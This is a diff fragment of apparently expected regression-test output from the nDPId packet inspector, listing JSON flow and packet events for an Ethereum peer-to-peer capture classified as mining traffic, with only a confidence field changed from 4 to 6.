00468{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":650,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":40,"flow_packet_id":3,"flow_last_seen":1578508365065,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1578508365065,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA0AABAAEAGu0vAqAG4sj4K2t1Cdl8xVnl6Bmz+SIAQECxokQAAAQEICiLYlkYLgra+"} 00667{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":651,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":8,"flow_packet_id":3,"flow_last_seen":1578508365065,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":213,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":213,"pkt_l4_len":179,"thread_ts_msec":1578508365065,"pkt":"EBMx8Tl2KDc3AG3ICABFAADHKIQAAEAR+iHAqAG4QipS9nZfdl8As8h52l5Lj\/FNPSwNskN7KXHg69sINFX5NaCleeEwgXwmONn61xupKUye1QOfHD1DMyDw8Rv4bxSGME4AJ9XC7q+0Pwz+NqNAUtNYGL1TDF+F5wROIhyoide5OcgIFnuRD6baAQP4R7hAggEUSZWpWZm0YK3HCqZiBR7sHJ3wp8USPzyX73HGoWVqts4UjRd8TfDxZuCIPe7jI\/CXMWJB7l7pTCCyfJvg8YReFiBh"} -00763{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":652,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":40,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1578508365021,"flow_last_seen":1578508365066,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":415,"flow_tot_l4_payload_len":415,"flow_avg_l4_payload_len":103,"midstream":0,"thread_ts_msec":1578508365066,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"178.62.10.218","src_port":56642,"dst_port":30303,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} +00763{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":652,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":40,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1578508365021,"flow_last_seen":1578508365066,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":415,"flow_tot_l4_payload_len":415,"flow_avg_l4_payload_len":103,"midstream":0,"thread_ts_msec":1578508365066,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"178.62.10.218","src_port":56642,"dst_port":30303,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} 00480{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":671,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":41,"flow_packet_id":2,"flow_last_seen":1578508365074,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1578508365074,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA8AABAADQGtGayPh23wKgBuHZf3UMO43zOltsrhKAScSBk2gAAAgQFrAQCCArDycEqItiWJgEDAwc="} 00468{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":672,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":41,"flow_packet_id":3,"flow_last_seen":1578508365074,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1578508365074,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA0AABAAEAGqG7AqAG4sj4dt91Ddl+W2yuEDuN8z4AQECz0awAAAQEICiLYlk3DycEq"} -00763{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":673,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":41,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1578508365029,"flow_last_seen":1578508365075,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":469,"flow_tot_l4_payload_len":469,"flow_avg_l4_payload_len":117,"midstream":0,"thread_ts_msec":1578508365075,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"178.62.29.183","src_port":56643,"dst_port":30303,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} +00763{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":673,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":41,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1578508365029,"flow_last_seen":1578508365075,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":469,"flow_tot_l4_payload_len":469,"flow_avg_l4_payload_len":117,"midstream":0,"thread_ts_msec":1578508365075,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"178.62.29.183","src_port":56643,"dst_port":30303,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} 00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":700,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":44,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1578508365079,"flow_last_seen":1578508365079,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1578508365079,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"172.105.94.62","src_port":56646,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":700,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":44,"flow_packet_id":1,"flow_last_seen":1578508365079,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1578508365079,"pkt":"EBMx8Tl2KDc3AG3ICABFAABAAABAAEAGbbDAqAG4rGlePt1Gdl8dOmrnAAAAALAC\/\/\/VAwAAAgQFtAEDAwUBAQgKItiWUQAAAAAEAgAA"} 00481{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":702,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":43,"flow_packet_id":2,"flow_last_seen":1578508365092,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1578508365092,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA8AABAADEGSEK524U+wKgBuHZf3UWdKkNsjzbHKaASbCBIRwAAAgQFdAQCCAp\/mc8NItiWMgEDAwc="} 00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":703,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":43,"flow_packet_id":3,"flow_last_seen":1578508365092,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1578508365092,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA0AABAAEAGOUrAqAG4uduFPt1Fdl+PNscpnSpDbYAQEAzSvAAAAQEICiLYll1\/mc8N"} -00764{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":718,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":43,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1578508365045,"flow_last_seen":1578508365094,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":410,"flow_tot_l4_payload_len":410,"flow_avg_l4_payload_len":102,"midstream":0,"thread_ts_msec":1578508365094,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"185.219.133.62","src_port":56645,"dst_port":30303,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} +00764{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":718,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":43,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1578508365045,"flow_last_seen":1578508365094,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":410,"flow_tot_l4_payload_len":410,"flow_avg_l4_payload_len":102,"midstream":0,"thread_ts_msec":1578508365094,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"185.219.133.62","src_port":56645,"dst_port":30303,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} 00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":728,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":45,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1578508365094,"flow_last_seen":1578508365094,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1578508365094,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"182.162.161.61","src_port":56647,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":728,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":45,"flow_packet_id":1,"flow_last_seen":1578508365094,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1578508365094,"pkt":"EBMx8Tl2KDc3AG3ICABFAABAAABAAEAGIHjAqAG4tqKhPd1Hdl8HffxGAAAAALAC\/\/8MGQAAAgQFtAEDAwUBAQgKItiWYAAAAAAEAgAA"} 00481{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":755,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":44,"flow_packet_id":2,"flow_last_seen":1578508365104,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1578508365104,"pkt":"KDc3AG3IEBMx8Tl2CABFCAA8AABAADMGeqysaV4+wKgBuHZf3UajVVX7HTpq6KAS\/ojIGAAAAgQFrAQCCAobAQsKItiWUQEDAwc="} 00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":756,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":44,"flow_packet_id":3,"flow_last_seen":1578508365104,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1578508365104,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA0AABAAEAGbbzAqAG4rGlePt1Gdl8dOmroo1VV\/IAQECzlIgAAAQEICiLYlmgbAQsK"} -00763{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":757,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":44,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1578508365079,"flow_last_seen":1578508365105,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":474,"flow_tot_l4_payload_len":474,"flow_avg_l4_payload_len":118,"midstream":0,"thread_ts_msec":1578508365105,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"172.105.94.62","src_port":56646,"dst_port":30303,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} +00763{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":757,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":44,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1578508365079,"flow_last_seen":1578508365105,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":474,"flow_tot_l4_payload_len":474,"flow_avg_l4_payload_len":118,"midstream":0,"thread_ts_msec":1578508365105,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"172.105.94.62","src_port":56646,"dst_port":30303,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} 00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":900,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":46,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1578508365153,"flow_last_seen":1578508365153,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1578508365153,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"35.228.250.140","src_port":56650,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":900,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":46,"flow_packet_id":1,"flow_last_seen":1578508365153,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1578508365153,"pkt":"EBMx8Tl2KDc3AG3ICABFAABAAABAAEAGWefAqAG4I+T6jN1Kdl95PEStAAAAALAC\/\/+LMAAAAgQFtAEDAwUBAQgKItiWjwAAAAAEAgAA"} 00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":904,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":47,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1578508365154,"flow_last_seen":1578508365154,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1578508365154,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"138.201.12.87","src_port":56651,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} @@ -212,23 +212,23 @@ 00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":924,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":48,"flow_packet_id":1,"flow_last_seen":1578508365169,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1578508365169,"pkt":"EBMx8Tl2KDc3AG3ICABFAABAAABAAEAGP33AqAG4sAmI0d1Mdl8ouUvbAAAAALAC\/\/+6CgAAAgQFtAEDAwUBAQgKItiWngAAAAAEAgAA"} 00480{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":928,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":47,"flow_packet_id":2,"flow_last_seen":1578508365186,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1578508365186,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA8AABAADIG7zuKyQxXwKgBuHZf3Uu6UG6Lx0dxOqAScSDP1QAAAgQFrAQCCAq1b4mgItiWjwEDAwc="} 00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":929,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":47,"flow_packet_id":3,"flow_last_seen":1578508365186,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1578508365186,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA0AABAAEAG4UPAqAG4iskMV91Ldl\/HR3E6ulBujIAQECxfbwAAAQEICiLYlq61b4mg"} -00763{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":932,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":47,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1578508365154,"flow_last_seen":1578508365187,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":417,"flow_tot_l4_payload_len":417,"flow_avg_l4_payload_len":104,"midstream":0,"thread_ts_msec":1578508365187,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"138.201.12.87","src_port":56651,"dst_port":30303,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} +00763{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":932,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":47,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1578508365154,"flow_last_seen":1578508365187,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":417,"flow_tot_l4_payload_len":417,"flow_avg_l4_payload_len":104,"midstream":0,"thread_ts_msec":1578508365187,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"138.201.12.87","src_port":56651,"dst_port":30303,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} 00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":954,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":49,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1578508365189,"flow_last_seen":1578508365189,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1578508365189,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"85.214.108.52","src_port":56654,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":954,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":49,"flow_packet_id":1,"flow_last_seen":1578508365189,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1578508365189,"pkt":"EBMx8Tl2KDc3AG3ICABFAABAAABAAEAGtk3AqAG4VdZsNN1Odl+\/h8KiAAAAALAC\/\/8jMQAAAgQFtAEDAwUBAQgKItiWsAAAAAAEAgAA"} 00590{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":955,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":50,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1578508365189,"flow_last_seen":1578508365189,"flow_idle_time":200000,"flow_min_l4_payload_len":128,"flow_max_l4_payload_len":128,"flow_tot_l4_payload_len":128,"flow_avg_l4_payload_len":128,"midstream":0,"thread_ts_msec":1578508365189,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"18.219.167.159","src_port":30303,"dst_port":30303,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00613{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":955,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":50,"flow_packet_id":1,"flow_last_seen":1578508365189,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":170,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":170,"pkt_l4_len":136,"thread_ts_msec":1578508365189,"pkt":"EBMx8Tl2KDc3AG3ICABFAACcflcAAEARfx\/AqAG4Etunn3Zfdl8AiGnBB7Pc5ZlsDZTbUrqaaoRxeL1l7Crbcxf\/BOXFZNGdyZsOxpmBlW67u9+KWe59CkWnKw2GIsEnEKk87oxTf3me3BvKcrMQD0jXMXlBXiHkLViPnwRaOVxyx4odh7D\/BO97AAHdBMuEfwAAAYJ2X4J2X8mEEtunn4J2X4CEXhYgYQU="} -00765{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":955,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":50,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1578508365189,"flow_last_seen":1578508365189,"flow_idle_time":200000,"flow_min_l4_payload_len":128,"flow_max_l4_payload_len":128,"flow_tot_l4_payload_len":128,"flow_avg_l4_payload_len":128,"midstream":0,"thread_ts_msec":1578508365189,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"18.219.167.159","src_port":30303,"dst_port":30303,"l4_proto":"udp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} +00765{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":955,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":50,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1578508365189,"flow_last_seen":1578508365189,"flow_idle_time":200000,"flow_min_l4_payload_len":128,"flow_max_l4_payload_len":128,"flow_tot_l4_payload_len":128,"flow_avg_l4_payload_len":128,"midstream":0,"thread_ts_msec":1578508365189,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"18.219.167.159","src_port":30303,"dst_port":30303,"l4_proto":"udp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} 00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":987,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":51,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1578508365194,"flow_last_seen":1578508365194,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1578508365194,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"202.112.28.106","src_port":56655,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":987,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":51,"flow_packet_id":1,"flow_last_seen":1578508365194,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1578508365194,"pkt":"EBMx8Tl2KDc3AG3ICABFAABAAABAAEAGkX3AqAG4ynAcat1Pdl84sWAlAAAAALAC\/\/\/nsAAAAgQFtAEDAwUBAQgKItiWswAAAAAEAgAA"} 00481{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1015,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":48,"flow_packet_id":2,"flow_last_seen":1578508365201,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1578508365201,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA8AABAADIGTYGwCYjRwKgBuHZf3UxCOLg9KLlL3KAScSB8NwAAAgQFrAQCCAqsVDbiItiWngEDAwc="} 00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1016,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":48,"flow_packet_id":3,"flow_last_seen":1578508365202,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1578508365202,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA0AABAAEAGP4nAqAG4sAmI0d1Mdl8ouUvcQji4PoAQECwL1AAAAQEICiLYlrqsVDbi"} -00764{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1017,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":48,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1578508365169,"flow_last_seen":1578508365203,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":531,"flow_tot_l4_payload_len":531,"flow_avg_l4_payload_len":132,"midstream":0,"thread_ts_msec":1578508365203,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"176.9.136.209","src_port":56652,"dst_port":30303,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} +00764{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1017,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":48,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1578508365169,"flow_last_seen":1578508365203,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":531,"flow_tot_l4_payload_len":531,"flow_avg_l4_payload_len":132,"midstream":0,"thread_ts_msec":1578508365203,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"176.9.136.209","src_port":56652,"dst_port":30303,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} 00481{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1018,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":46,"flow_packet_id":2,"flow_last_seen":1578508365210,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1578508365210,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA8AABAADYGY+sj5PqMwKgBuHZf3UovaHbWeTxErqASbgBmbgAAAgQFjAQCCAqaQodaItiWjwEDAwc="} 00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1019,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":46,"flow_packet_id":3,"flow_last_seen":1578508365210,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1578508365210,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA0AABAAEAGWfPAqAG4I+T6jN1Kdl95PESuL2h214AQECjytwAAAQEICiLYlsKaQoda"} -00765{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1028,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":46,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1578508365153,"flow_last_seen":1578508365212,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":462,"flow_tot_l4_payload_len":462,"flow_avg_l4_payload_len":115,"midstream":0,"thread_ts_msec":1578508365212,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"35.228.250.140","src_port":56650,"dst_port":30303,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} 